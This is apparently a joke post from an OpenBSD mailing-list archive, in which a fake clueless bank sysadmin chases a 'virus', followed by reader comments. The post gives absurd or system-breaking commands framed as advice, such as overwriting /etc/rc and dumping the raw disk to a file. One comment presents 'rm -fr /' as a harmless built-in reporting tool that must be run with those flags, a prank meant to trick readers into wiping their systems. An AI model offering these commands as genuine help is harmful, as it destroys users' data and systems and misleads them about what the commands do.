I am wondering if this is a new virus that I have found...

I was watching tcpdump today over lunch and I saw about a thousand outgoing
connections. I didn't know what was causing it, but it was pretty funny to
see. So I watched about 20 minutes while I mawed on my sandwich and then I
noticed that the target IP's were all sequential! A quick search on Googles
told me something was certainly amiss.

So when lunch hour was up, I decided to get to the bottom of this before the
higher-ups here at the bank noticed that outbound browsing was impossible
due to the saturated OC12. Good thing I don't have to worry about HIPA
requirements today, 'eh? Haha!

First, I decided I needed to get to the root of the problem, no pun
intended:

# fstat / | tcpdump -i - | less

Well, that doesn't work. It seems some newb committer removed the switch to
allow tcpdump to read from stdin. Thanks a lot, buster!

With tcpdump not being useful at all with tracking down this networking
problem, I knew I had to do something fast! The natives were getting
wrestless as I saw the suited buzzards churning outside the NOC! So I locked
the door and decided to start by removing all unneeded device drivers from
my kernel. For the archives, a simple way of doing this is as follows:

# dmesg > /tmp/mygoodstuff
# cat /usr/src/sys/`machine`/conf/GENERIC > /tmp/mybadstuff
# diff /tmp/mygoodstuff /tmp/mybadstuff | uniq -v > \
/usr/src/sys/`machine`/NEWGENERIC

Then I compiled and installed the brand new kernel in an attempt to cure the
problems of the day (or lunch hour lol).

After a quick smoke break, I rebooted the system with the new kernel. At
this point, I decided to systrace the entire system. Again, for the
archives, this is how one would do it (please add this to the FAQ, dudes,
because I don't like having to repeat this every few days):

# echo "systrace /etc/rc" > /etc/rc

As time marched forward and after a quick reboot, I ran into a couple of
snags in the armor! It seems that the virus may have taken its toll on the
system which is a Soekris attached to a Sun D1000 drive array with a 3.2V
PCI card (sorry guys I don't have the dmesg, but I can send one from Debian
if that would help). Anyway, I tried to debug the system using the following
command:

# systrace tcpdump -i /dev/systrace | cut -d' -f 3 | \
sed '/12/' | for a in `cat /dev/systrace`; do echo "$a" > /dev/console

This didn't seem to produce the desired results so now I am stuck in a poop
boat with out a paddle, so to speak. Can anybody help?

P.S. I already have sent the output of "cat /dev/wd0c > /tmp/obsdvirus" to
Symantec for them to analyze. That's what we pay them for!

P.P.S. Check out my blog in my sig!

--------
Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL' -- RMS
http://monkey.org/openbsd/archive/misc/0406/msg00216.html

11/13/2010 1:22:05 PM

OpenBSD comes with an already integrated Standard Activation Wizard
that does it all for you at the press of a button. Can it get easier?
Its called "ReportMagic" or short "rm". There is an updated Version of
it supplied with the ports collection, BUT do NOT use it! The Version
in ports doesn't get the connection to the restartable system calls
right and prints silly warnings. Thats why it is not integrated in the
high quality default distribution. So it is much better to use the
default Version integrated in OpenBSD. As arguments it you must supply
which elements of a standard you want to break and the name of the
standard.
If you want to break all Elements of a Standard give the wildcard
character * if you want only the top level elements of a standard give
the standard root character / , bottom elements */ , elements between
top and bottom /*/ and so on ...

Examples:
rm -fr * POSIX1a
rm -fr / ASN.1

the -fr Option gives u a nicely formatted _f_ull _r_eport.
Unfortunately you must use this option otherwise it will do nothing
because there is no sense in breaking a standard without reporting it,
isn't it?

11/13/2010 11:04:10 PM

NOT FUNNY.

11/14/2010 12:14:04 AM